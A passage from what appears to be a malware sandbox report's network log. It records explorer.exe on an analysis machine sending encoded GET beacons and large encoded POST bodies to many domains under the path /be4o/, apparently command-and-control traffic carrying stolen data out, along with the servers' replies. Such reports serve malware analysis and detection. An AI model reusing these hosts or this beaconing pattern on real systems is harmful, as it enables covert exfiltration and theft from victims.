                                                                                                                                                                                                                              Data Ascii: UaT28kUJG4ntRpcnBDr4YLgmaE4xeLQkLe0fFl0XENtIEd-17z0U_uqn0ArBZdx~QIUNKvldvq77usz7EQjuTg3JzV3n3oy7_K1BKCw29JcO9VYddgLAUgwwkZOtpPlVOgSIsCt2gTDioX7mZNfWZw8pQNdvP5o0D2FDyX_qvUIgIE3m8YHE7wM0mr8bLsLePFgDcIq(bySS1KwGtmqvxdfcWDSYSa-Z2zO9x422PEZaZHZzlS4
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.556936979 CET10246OUTData Raw: 53 50 33 56 36 68 75 4f 52 4e 57 38 36 50 39 28 41 36 72 73 41 47 45 72 71 54 6b 51 71 76 7a 6a 43 47 35 37 34 66 77 4e 41 6d 31 35 58 70 6d 36 41 6a 74 57 63 74 57 57 7a 44 76 77 35 42 7a 4e 4a 65 32 63 55 71 69 34 58 54 4b 65 4c 39 4a 54 77 50
                                                                                                                                                                                                                              Data Ascii: SP3V6huORNW86P9(A6rsAGErqTkQqvzjCG574fwNAm15Xpm6AjtWctWWzDvw5BzNJe2cUqi4XTKeL9JTwPcOpWEnzXOUDHV4TVg6Nz5kjua1j3s6ZBKth5dJ8KXqtGKTRXXHr3QNG7tQedo~ozvhoLFql8dsroO4LGrkEkBrGg3Yp6zVCizuOBOoDqIj1dZS_zDvo16G_dSalF5BUNJHF7Oj6N6TGaQjlkBV01vf2ulD0lLtatr
                                                                                                                                                                                                                              Feb 21, 2022 16:55:13.557013035 CET10255OUTData Raw: 57 7e 34 41 65 49 30 36 5a 33 65 48 50 37 4c 36 45 36 63 45 43 68 35 79 34 64 67 71 72 42 62 4b 39 48 36 48 4a 4a 53 47 52 30 47 4d 4c 55 6b 73 5f 4c 70 4b 52 32 76 74 37 28 4d 53 4a 5a 49 33 55 62 59 4b 68 46 2d 4a 79 59 7a 72 42 72 6f 53 7a 7e
                                                                                                                                                                                                                              Data Ascii: W~4AeI06Z3eHP7L6E6cECh5y4dgqrBbK9H6HJJSGR0GMLUks_LpKR2vt7(MSJZI3UbYKhF-JyYzrBroSz~IGV5Sx_iZqqTiCHNKLalyDokzoaOGr8xk9rncyvhTydOQ2E84ErsKbHUTyd4uJ0bLrzzfQdd7hn4ye0RoElGYoTmHXF~Zwe~ChRAbQfH5Ni(jvn5uKlAHYzo5uQCSzTePHQPpbi3OExtxxp4eETEVNjlwMf2jB66M
Feb 21, 2022 16:56:14.125657082 CET | 11560 | IN | HTTP/1.1 504 Gateway Time-out
                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:56:14 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 176
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body bgcolor="white"><center><h1>504 Gateway Time-out</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
37 | 192.168.11.20 | 49834 | 154.214.67.115 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:55:13.352895975 CET | 10208 | OUT | GET /be4o/?h48Hl=kw7dGhb5eKkyCVvAuZmYTQsgnBkQwasXlJHrp3Yi63/vNGhbWFnPnmRrKjdxIJy9M/yz&7nx8=7nN0Wh-H7 HTTP/1.1
                                                                                                                                                                                                                              Host: www.nagradi7.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
Feb 21, 2022 16:55:13.532075882 CET | 10231 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:55:13 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 1558
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#24433;&#38899;&#20808;&#38155;&#50;&#48;&#49;&#56;&#26368;&#26032;&#30475;&#29255;&#36164;&#28304;,&#23588;&#29289;&#32593;&#22336;&#22312;&#32447;&#35266;&#30475;,&#31881;&#23273;&#34382;&#30333;&#22899;&#49;&#56;&#80;,&#20013;&#22269;&#20154;&#22312;&#32447;&#35270;&#39057;&#25773;&#25918;</title><meta name="keywords" content="&#24433;&#38899;&#20808;&#38155;&#50;&#48;&#49;&#56;&#26368;&#26032;&#30475;&#29255;&#36164;&#28304;,&#23588;&#29289;&#32593;&#22336;&#22312;&#32447;&#35266;&#30475;,&#31881;&#23273;&#34382;&#30333;&#22899;&#49;&#56;&#80;,&#20013;&#22269;&#20154;&#22312;&#32447;&#35270;&#39057;&#25773;&#25918;" /><meta name="description" content="&#24433;&#38899;&#20808;&#38155;&#50;&#48;&#49;&#56;&#26368;&#26032;&#30475;&#29255;&#36164;&#28304;,&#23588;&#29289;&#32593;&#22336;&#22312;&#32447;&#35266;&#30475;,&#31881;&#23273;&#34382;&#30333;&#22899;&#49;&#56;&#80;,&#20013;&#22269;&#20154;&#22312;&#32447;&#35270;&#39057;&#25773;&#25918;,&#22823;&#23610;&#24230;&#28608;&#28872;&#24202;&#21563;&#25103;&#35270;&#39057;,&#20013;&#25
Feb 21, 2022 16:55:13.532104969 CET | 10231 | IN |
                                                                                                                                                                                                                              Data Ascii: 991;&#23383;&#24149;&#35270;&#39057;&#20108;&#21306;&#20154;&#22971;,&#22320;&#38081;&#37324;&#30340;&#35825;&#24785;" /><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /></head><script language="javascript" type="tex


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
38 | 192.168.11.20 | 49835 | 95.179.246.125 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:55:18.553345919 CET | 10380 | OUT | POST /be4o/ HTTP/1.1
                                                                                                                                                                                                                              Host: www.waktuk.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Length: 174831
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Origin: http://www.waktuk.com
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Referer: http://www.waktuk.com/be4o/
                                                                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
Feb 21, 2022 16:55:18.567190886 CET | 10393 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 21 Feb 2022 15:55:18 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://waktuk.com/be4o/
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
39 | 192.168.11.20 | 49836 | 95.179.246.125 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:55:18.565838099 CET | 10392 | OUT | GET /be4o/?7nx8=7nN0Wh-H7&h48Hl=ZACv9IykpsLcwv8F8kwPwUzl7gpv2Xu+P+MOxVxbXGrtU1PWc37Ho1yUPVVacpXBvcfu HTTP/1.1
Host: www.waktuk.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 21, 2022 16:55:18.577024937 CET | 10396 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 21 Feb 2022 15:55:18 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://waktuk.com/be4o/?7nx8=7nN0Wh-H7&h48Hl=ZACv9IykpsLcwv8F8kwPwUzl7gpv2Xu+P+MOxVxbXGrtU1PWc37Ho1yUPVVacpXBvcfu
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.11.20 | 49779 | 79.110.48.188 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:51:29.980031013 CET | 8953 | OUT | GET /be4o/?h48Hl=zyUBHNqGnW7VnxSitCDb9MggHqAMtGNnwmK4vVI2BlMgKT8HiANJi7OUdKuilZWbd1L3&GXqXh=YZ_XN0 HTTP/1.1
Host: www.neonewway.club
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 21, 2022 16:51:30.154654980 CET | 8954 | IN | HTTP/1.1 404 Not Found
Date: Mon, 21 Feb 2022 15:51:30 GMT
Server: Apache
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Length: 203
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /be4o/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
40 | 192.168.11.20 | 49839 | 66.29.154.157 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:55:23.744302988 CET | 10428 | OUT | POST /be4o/ HTTP/1.1
Host: www.buresdx.com
Connection: close
Content-Length: 174831
Cache-Control: no-cache
Origin: http://www.buresdx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.buresdx.com/be4o/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              Feb 21, 2022 16:55:23.902920961 CET10454OUTData Raw: 35 33 7a 79 41 57 59 59 6f 37 6d 68 34 6d 4b 76 38 79 35 57 75 4d 4b 48 71 56 6b 4e 4b 61 75 57 78 42 65 72 35 42 63 41 50 57 38 4e 6a 6b 36 4c 48 64 46 73 57 50 34 45 73 51 50 63 67 6b 45 75 64 39 28 75 57 62 56 54 74 41 54 66 33 4f 54 45 6c 74
                                                                                                                                                                                                                              Data Ascii: 53zyAWYYo7mh4mKv8y5WuMKHqVkNKauWxBer5BcAPW8Njk6LHdFsWP4EsQPcgkEud9(uWbVTtATf3OTEltyxBJzxjnfiJFN-jHs0(jjL999CRpdO~a7IHwoamOpJwQea94keHw6ANCjg1hwKQ71vcuKDHlRo4LGkvMCQz6MPn3fYvlUmAtCpI3q2Iewtn692Wn(T4UUGjod_hL1C9BiIiJwFHCIq1tPzMABnNoY8j2KOcMNoTeq
                                                                                                                                                                                                                              Feb 21, 2022 16:55:23.903737068 CET10456OUTData Raw: 61 4b 59 5f 46 30 39 31 32 78 4d 6d 6c 5f 61 73 76 44 4f 61 49 33 55 43 73 52 6e 66 4d 38 33 56 54 75 76 46 76 5f 32 52 66 45 52 6a 33 69 7e 2d 56 38 51 62 70 73 32 75 63 68 6e 65 36 45 47 54 42 53 64 58 52 56 4e 71 37 37 47 32 48 49 73 34 4a 50
                                                                                                                                                                                                                              Data Ascii: aKY_F0912xMml_asvDOaI3UCsRnfM83VTuvFv_2RfERj3i~-V8Qbps2uchne6EGTBSdXRVNq77G2HIs4JPugnhZPLQzCeJ~mzWq-sV9q~X(P81yfdwTJ0AHTViy6Jqp3DX~m8-L31wbyNnSmHuFSM-eiMYIKP6L-xMYRD2mhATAGd4E1cZQFzTyTd1kpS8p-3ayBAyCHq_5onY~PGikp3HuCQapyv-6-Lmzkxvw8ywtxYTH8Z6j
                                                                                                                                                                                                                              Feb 21, 2022 16:55:23.903835058 CET10459OUTData Raw: 47 6f 50 55 4e 6f 6e 77 49 51 59 57 34 71 66 55 7e 55 4a 42 30 32 6e 46 4d 33 47 4e 76 6e 7a 53 77 5a 77 68 55 4e 39 66 6f 50 4c 63 4e 61 42 50 48 39 6e 6b 48 65 39 78 31 65 6b 38 73 42 68 61 33 64 34 39 4f 5f 65 7a 48 58 28 4d 28 64 30 59 28 4f
                                                                                                                                                                                                                              Data Ascii: GoPUNonwIQYW4qfU~UJB02nFM3GNvnzSwZwhUN9foPLcNaBPH9nkHe9x1ek8sBha3d49O_ezHX(M(d0Y(Om3mXuKRPPg0dUxWq6KUxGydPfcREe43pxJtpX_DFLQ~u8t93QQu1QhAZKp04XyqlkDVPob3t3d3k8kn7m53tvo0o4JD-aGSUtgZa4fqW8CpOHeWJyW6qeL252FKZ7aivvM1jDdW8OzbnWfmjqztRPbnE5GXNHXMhJ
                                                                                                                                                                                                                              Feb 21, 2022 16:55:23.904175043 CET10462OUTData Raw: 41 52 61 71 28 6b 7a 5a 7a 45 7a 33 6c 41 36 6c 7a 67 77 72 66 42 39 6b 41 66 63 59 47 30 64 74 6a 61 37 35 37 72 37 6c 79 57 6e 4f 34 43 28 76 30 6e 6e 4f 68 2d 34 73 76 42 65 4b 31 47 59 63 79 58 59 41 75 51 6f 31 79 6f 49 6f 6f 55 51 63 5a 73
                                                                                                                                                                                                                              Data Ascii: ARaq(kzZzEz3lA6lzgwrfB9kAfcYG0dtja757r7lyWnO4C(v0nnOh-4svBeK1GYcyXYAuQo1yoIooUQcZsaZMCS5N_rxPq(-giRJTbQoC8c5Zq5sEaCeOV92WYEL~mHp1yYU9rjsSukGct81Jx0cKxD6146f6C(SG6trDgBesUfBwq7IeLyKyzOdT4UMV5Qx~nQTTSbbAq~FGiWynYF63LrkmLC3mJ(PMjLVKndGL0eH(Zaalpy
                                                                                                                                                                                                                              Feb 21, 2022 16:55:24.059092045 CET10465OUTData Raw: 37 33 38 31 78 73 55 4f 6c 4e 44 59 67 42 6b 2d 77 38 6d 37 35 67 56 59 41 71 65 34 43 48 45 79 77 33 78 37 69 4c 44 63 45 78 62 74 62 4a 61 32 67 56 63 59 66 52 6c 58 7e 77 76 65 79 41 64 5a 7e 73 62 5a 4c 76 76 7a 6f 30 5a 63 35 52 33 6c 47 6a
                                                                                                                                                                                                                              Data Ascii: 7381xsUOlNDYgBk-w8m75gVYAqe4CHEyw3x7iLDcExbtbJa2gVcYfRlX~wveyAdZ~sbZLvvzo0Zc5R3lGj0oB1(yZUNHd1CvRdlBMn4z~E2VTNiqSN3jqusA4nX3QGo75-1In0xsQGvMr0YXN1CH1OHAKKLvTb~GX848PtsOS2sKzcxVDE~EOqauKdLpf5iSZUsg803m6dzXkvi2KAKNNtd6GFwBJQwMUHOsctw7XTKDO8163un
Feb 21, 2022 16:55:24.497716904 CET | 10600 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:55:23 GMT
                                                                                                                                                                                                                              Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                                                                                              Content-Length: 277
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.buresdx.com Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
41 | 192.168.11.20 | 49840 | 66.29.154.157 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:55:25.911765099 CET | 10601 | OUT | GET /be4o/?h48Hl=CBV85lUl5iGXXllmWETcgzTRYTuU0jkLI/xLLa4RVPF6HDjlZoPpCKC/374THXhEpvSN&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.buresdx.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
Feb 21, 2022 16:55:26.128814936 CET | 10601 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:55:25 GMT
                                                                                                                                                                                                                              Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                                                                                              Content-Length: 277
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.buresdx.com Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
42 | 192.168.11.20 | 49841 | 142.250.186.51 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:55:32.999233961 CET | 10603 | OUT | POST /be4o/ HTTP/1.1
                                                                                                                                                                                                                              Host: www.eaglesaviationexperience.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Length: 174831
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Origin: http://www.eaglesaviationexperience.com
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Referer: http://www.eaglesaviationexperience.com/be4o/
                                                                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
Feb 21, 2022 16:55:33.526510954 CET | 10784 | IN | HTTP/1.1 301 Moved Permanently
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 21 Feb 2022 15:55:33 GMT
Location: https://www.eaglesaviationexperience.com/be4o/
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
43 | 192.168.11.20 | 49842 | 142.250.186.51 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:55:33.008661985 CET | 10615 | OUT | GET /be4o/?7nx8=7nN0Wh-H7&h48Hl=mz0ZGmPpQcHdBZrVbfezv7ox+MCQwaRA1qHDhj9nMfECw2TGe1c3Y7+z1tjTr42phwlz HTTP/1.1
Host: www.eaglesaviationexperience.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 21, 2022 16:55:33.118576050 CET | 10783 | IN | HTTP/1.1 301 Moved Permanently
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 21 Feb 2022 15:55:33 GMT
Location: https://www.eaglesaviationexperience.com/be4o/?7nx8=7nN0Wh-H7&h48Hl=mz0ZGmPpQcHdBZrVbfezv7ox+MCQwaRA1qHDhj9nMfECw2TGe1c3Y7+z1tjTr42phwlz
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
44 | 192.168.11.20 | 49843 | 91.184.31.217 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:55:38.192070007 CET | 10787 | OUT | POST /be4o/ HTTP/1.1
Host: www.easypeasy.community
Connection: close
Content-Length: 174831
Cache-Control: no-cache
Origin: http://www.easypeasy.community
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.easypeasy.community/be4o/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Feb 21, 2022 16:55:38.209059954 CET | 10798 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx/1.20.2
Date: Mon, 21 Feb 2022 15:55:38 GMT
Content-Type: text/html
Content-Length: 169
Connection: close
Location: https://www.easypeasy.community/be4o/
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.20.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
45 | 192.168.11.20 | 49844 | 91.184.31.217 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:55:38.209454060 CET | 10809 | OUT | GET /be4o/?h48Hl=qw7hUB7wiBY63PZfQs3gDL1/RbwQ/gEcLPIEvk4CQbmdP+9FY8/qx5kKOZH67IcfD5ki&7nx8=7nN0Wh-H7 HTTP/1.1
Host: www.easypeasy.community
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 21, 2022 16:55:38.226428986 CET | 10810 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx/1.20.2
Date: Mon, 21 Feb 2022 15:55:38 GMT
Content-Type: text/html
Content-Length: 169
Connection: close
Location: https://www.easypeasy.community/be4o/?h48Hl=qw7hUB7wiBY63PZfQs3gDL1/RbwQ/gEcLPIEvk4CQbmdP+9FY8/qx5kKOZH67IcfD5ki&7nx8=7nN0Wh-H7
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.20.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
46 | 192.168.11.20 | 49845 | 185.190.39.52 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:55:48.389020920 CET | 10817 | OUT | POST /be4o/ HTTP/1.1
                                                                                                                                                                                                                              Host: www.dreamintelligent.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Length: 174831
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Origin: http://www.dreamintelligent.com
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Referer: http://www.dreamintelligent.com/be4o/
                                                                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
Feb 21, 2022 16:55:49.259237051 CET | 10988 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                              X-Redirect-By: WordPress
                                                                                                                                                                                                                              Location: https://www.dreamintelligent.com/be4o/
                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:55:49 GMT
                                                                                                                                                                                                                              Server: LiteSpeed
                                                                                                                                                                                                                              Vary: User-Agent


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
47 | 192.168.11.20 | 49846 | 185.190.39.52 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:55:48.487391949 CET | 10824 | OUT | GET /be4o/?h48Hl=3gaGgvCHlfs+sPey4wEISFn1QJRwzcaNyq85jGUXFNKJ+AEleqZoXJJYcNbcoOST9cbz&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.dreamintelligent.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
Feb 21, 2022 16:55:49.019653082 CET | 10987 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                              X-Redirect-By: WordPress
                                                                                                                                                                                                                              Location: https://www.dreamintelligent.com/be4o/?h48Hl=3gaGgvCHlfs+sPey4wEISFn1QJRwzcaNyq85jGUXFNKJ+AEleqZoXJJYcNbcoOST9cbz&GXqXh=YZ_XN0
                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:55:48 GMT
                                                                                                                                                                                                                              Server: LiteSpeed
                                                                                                                                                                                                                              Vary: User-Agent


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
48 | 192.168.11.20 | 49849 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:55:54.026768923 CET | 11020 | OUT | POST /be4o/ HTTP/1.1
                                                                                                                                                                                                                              Host: www.josiemaran-supernatural.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Length: 174831
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Origin: http://www.josiemaran-supernatural.com
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Referer: http://www.josiemaran-supernatural.com/be4o/
                                                                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
Feb 21, 2022 16:55:54.197734118 CET | 11192 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:55:54 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_CpLPvD4XQuVnha6rO1wNCX6rSp91UJvoNJN0meDWFFo5JM5s7CpzF76GDsyLNNL0W4YULbTU4G/1WiDDezugCQ
                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
49 | 192.168.11.20 | 49850 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 21, 2022 16:55:54.036108017 CET | 11027 | OUT | GET /be4o/?h48Hl=do8Jf58SEKGGCNGHZbpskk9a9mhTmrx8G+lp6qHzh6DMjzgDqGs60o4ehjqHyuaS4N4w&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.josiemaran-supernatural.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
Feb 21, 2022 16:55:54.205997944 CET | 11193 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:55:54 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 275
                                                                                                                                                                                                                              ETag: "620175f4-113"
                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                              Connection: close
